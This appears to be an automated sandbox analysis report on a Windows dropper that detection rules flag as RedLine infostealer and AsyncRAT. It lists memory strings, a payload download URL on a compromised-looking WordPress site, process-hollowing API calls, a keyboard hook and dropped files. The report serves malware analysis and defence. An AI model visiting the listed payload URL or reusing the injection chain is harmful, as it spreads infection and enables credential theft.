                Source: x.exe, 00000004.00000002.1593299514.000000007F670000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000000.1470846029.0000000000401000.00000020.00000001.01000000.00000004.sdmp, esentutl.exe, 0000000A.00000003.1539123679.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.delphiexpert.ruopenSV
                Source: x.exe, x.exe, 00000004.00000002.1544141056.0000000000780000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478142210.0000000002959000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1596172530.000000007FE2F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1588992126.0000000021CF5000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478393290.000000007FBDF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1555508277.000000000295A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1588565232.0000000021AF0000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000000.1541408812.0000000000416000.00000002.00000001.01000000.00000007.sdmp, wdmvmswJ.pif, 0000001E.00000000.1659150073.0000000000416000.00000002.00000001.01000000.00000007.sdmp, wdmvmswJ.pif, 00000026.00000000.1748296146.0000000000416000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.pmail.com
                Source: wdmvmswJ.pif, 0000000C.00000003.2071578798.0000000020950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                Source: x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chichometextiles.com/
                Source: x.exe, 00000004.00000002.1582582313.00000000208DD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chichometextiles.com/wp-
                Source: x.exe, 00000004.00000002.1582582313.00000000208EC000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1544141056.000000000072F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1544141056.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.00000000208C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chichometextiles.com/wp-admin/233_Jwsmvmdweya
                Source: x.exe, 00000004.00000002.1544141056.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chichometextiles.com/wp-admin/233_JwsmvmdweyaM
                Source: x.exe, 00000004.00000002.1544141056.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chichometextiles.com:443/wp-admin/233_Jwsmvmdweyah
                Source: wdmvmswJ.pif, 0000000C.00000003.2111219568.0000000020950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
                Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49707 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Users\Public\Libraries\wdmvmswJ.pif Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\wdmvmswJ.pif

                System Summary

                Source: 38.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 30.2.wdmvmswJ.pif.400000.3.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 30.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 30.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 30.2.wdmvmswJ.pif.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 38.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 38.2.wdmvmswJ.pif.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 12.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 12.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 38.2.wdmvmswJ.pif.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 00000026.00000001.1748961423.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 0000001E.00000001.1659980996.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 0000001E.00000002.1740115481.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000026.00000002.1813978225.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifProcess Stats: CPU usage > 49%
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B08670 NtUnmapViewOfSection,4_2_02B08670
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B08400 NtReadVirtualMemory,4_2_02B08400
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B07A2C NtAllocateVirtualMemory,4_2_02B07A2C
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,4_2_02B0DC8C
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,4_2_02B0DC04
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B08D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,4_2_02B08D70
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,4_2_02B0DD70
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B07D78 NtWriteVirtualMemory,4_2_02B07D78
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B07A2A NtAllocateVirtualMemory,4_2_02B07A2A
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B0DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,4_2_02B0DBB0
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B08D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,4_2_02B08D6E
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00024823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,13_2_00024823
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0002643A NtOpenThreadToken,NtOpenProcessToken,NtClose,13_2_0002643A
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00037460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,13_2_00037460
                Source: C:\Users\Public\alpha.pifCode function: 13_2_000264CA NtQueryInformationToken,13_2_000264CA
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00026500 NtQueryInformationToken,NtQueryInformationToken,13_2_00026500
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0003A135 NtSetInformationFile,13_2_0003A135
                Source: C:\Users\Public\alpha.pifCode function: 13_2_0003C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,13_2_0003C1FA
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00014E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,13_2_00014E3B
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00024759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,13_2_00024759
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00024823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,17_2_00024823
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0002643A NtOpenThreadToken,NtOpenProcessToken,NtClose,17_2_0002643A
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00037460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,17_2_00037460
                Source: C:\Users\Public\alpha.pifCode function: 17_2_000264CA NtQueryInformationToken,17_2_000264CA
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00026500 NtQueryInformationToken,NtQueryInformationToken,17_2_00026500
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0003A135 NtSetInformationFile,17_2_0003A135
                Source: C:\Users\Public\alpha.pifCode function: 17_2_0003C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,17_2_0003C1FA
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00014E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,17_2_00014E3B
                Source: C:\Users\Public\alpha.pifCode function: 17_2_00024759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,17_2_00024759
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029C8670 NtUnmapViewOfSection,27_2_029C8670
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029C8400 NtReadVirtualMemory,27_2_029C8400
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029C7A2C NtAllocateVirtualMemory,27_2_029C7A2C
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029C7D78 NtWriteVirtualMemory,27_2_029C7D78
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029C8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,27_2_029C8D70
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029CDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,27_2_029CDD70
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029C86F7 NtUnmapViewOfSection,27_2_029C86F7
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029C7AC9 NtAllocateVirtualMemory,27_2_029C7AC9
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029C7A2A NtAllocateVirtualMemory,27_2_029C7A2A
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029CDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,27_2_029CDBB0
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029CDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,27_2_029CDC8C
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029CDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,27_2_029CDC04
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 27_2_029C8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,27_2_029C8D6E
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029E8670 NtUnmapViewOfSection,36_2_029E8670
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029E8400 NtReadVirtualMemory,36_2_029E8400
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029E7A2C NtAllocateVirtualMemory,36_2_029E7A2C
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029E7D78 NtWriteVirtualMemory,36_2_029E7D78
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029E8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,36_2_029E8D70
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029EDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,36_2_029EDD70
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029E86F7 NtUnmapViewOfSection,36_2_029E86F7
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029E7AC9 NtAllocateVirtualMemory,36_2_029E7AC9
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029E7A2A NtAllocateVirtualMemory,36_2_029E7A2A
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029EDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,36_2_029EDBB0
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029EDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,36_2_029EDC8C
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029EDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,36_2_029EDC04
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: 36_2_029E8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,36_2_029E8D6E
                Source: C:\Users\Public\alpha.pifCode function: 13_2_00014C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,13_2_00014C10
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B08788 CreateProcessAsUserW,4_2_02B08788
                Source: C:\Users\Public\alpha.pifFile created: C:\Windows
                Source: C:\Users\Public\alpha.pifFile created: C:\Windows \SysWOW64
                Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\b2310dff430b0ac5.bin
                Source: C:\Users\Public\alpha.pifFile deleted: C:\Windows \SysWOW64
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load Driver
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Security
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02AF44DC appears 74 times
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B089D0 appears 45 times
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02AF4500 appears 33 times
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02AF4860 appears 949 times
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02B0894C appears 56 times
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 02AF46D4 appears 244 times
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: String function: 029D4860 appears 683 times
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: String function: 029E894C appears 50 times
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: String function: 029D46D4 appears 155 times
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: String function: 029B4860 appears 683 times
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: String function: 029B46D4 appears 155 times
                Source: C:\Users\Public\Libraries\Jwsmvmdw.PIFCode function: String function: 029C894C appears 50 times
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: String function: 0040D606 appears 72 times
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifCode function: String function: 0040E1D8 appears 129 times
                Source: Acrobat.exe.12.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                Source: chrmstp.exe.12.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                Source: chrmstp.exe.12.drStatic PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
                Source: setup.exe0.12.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
                Source: setup.exe0.12.drStatic PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
                Source: 117.0.5938.132_chrome_installer.exe.12.drStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.4
                Source: 117.0.5938.132_chrome_installer.exe.12.drStatic PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression
                Source: ie_to_edge_stub.exe.12.drStatic PE information: Number of sections : 11 > 10
                Source: identity_helper.exe.12.drStatic PE information: Number of sections : 12 > 10
                Source: elevation_service.exe0.12.drStatic PE information: Number of sections : 12 > 10
                Source: chrmstp.exe.12.drStatic PE information: Number of sections : 14 > 10
                Source: elevation_service.exe.12.drStatic PE information: Number of sections : 12 > 10
                Source: msedgewebview2.exe.12.drStatic PE information: Number of sections : 14 > 10
                Source: setup.exe1.12.drStatic PE information: Number of sections : 13 > 10
                Source: chrome_pwa_launcher.exe.12.drStatic PE information: Number of sections : 13 > 10
                Source: setup.exe0.12.drStatic PE information: Number of sections : 14 > 10
                Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                Source: 38.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 30.2.wdmvmswJ.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 30.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 30.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 30.2.wdmvmswJ.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 38.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 38.2.wdmvmswJ.pif.400000.5.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 12.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 12.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 38.2.wdmvmswJ.pif.400000.5.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 00000026.00000001.1748961423.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 0000001E.00000001.1659980996.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 0000001E.00000002.1740115481.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000026.00000002.1813978225.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: Acrobat.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: updater.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: Au3Info.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: Au3Info_x64.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AutoIt3Help.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AutoIt3_x64.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: appvcleaner.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: SciTE.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AppVShNotify.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AdobeARMHelper.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: IntegratedOffice.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: MavInject32.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: OfficeC2RClient.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: officesvcmgr.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: chrome_pwa_launcher.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: chrmstp.exe.12.dr, Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
